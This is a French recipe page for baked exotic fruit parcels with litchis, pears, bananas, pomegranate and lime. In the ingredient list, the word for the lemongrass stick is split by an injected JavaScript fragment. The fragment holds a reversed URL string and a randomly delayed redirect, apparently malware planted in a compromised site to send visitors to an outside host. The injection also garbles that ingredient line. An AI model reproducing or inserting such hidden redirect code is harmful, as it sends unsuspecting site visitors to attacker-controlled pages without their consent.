FRUITS EXOTIQUES EN PAPILLOTE

FRUITS EXOTIQUES EN PAPILLOTE

Pour 4 Pers.

INGRÉDIENTS :

– 12 litchis
– 2 poires
– 1 grenade
– 2 bananes
– 1 citron
– 1 citron vert
– 5 feuilles de basilic
– 4 CS d’édulcorant de cuisson en poudre
– 1 bâtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton de citronnelle finement émincé (facultatif)

Éplucher les bananes et les poires.

Couper les bananes en rondelles et les poires en lamelles.

Arroser avec le jus du citron.

Éplucher les litchis et enlever les noyaux.


Faire 4 papillotes avec du papier cuisson ou de l’aluminium resistant (spécial papillote).

Préchauffer le four à 210°. Sur chaque feuille de cuisson répartir l’équivalent d’1/2 banane, ½ poire et 3 litchis.


Couper 4 tranches de citron vert et arroser les fruits du reste de jus.


Déposer les rondelles sur le dessus et saupoudrer d’édulcorant.

Refermer les papillotes puis enfourner pour 10 minutes.


En fin de cuisson, fendre le dessus des papillotes en croix, parsemer de graines de grenade, de citronnelle de quelques feuilles de basilic ciselées, et de 2 petites feuilles entières pour la déco.

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.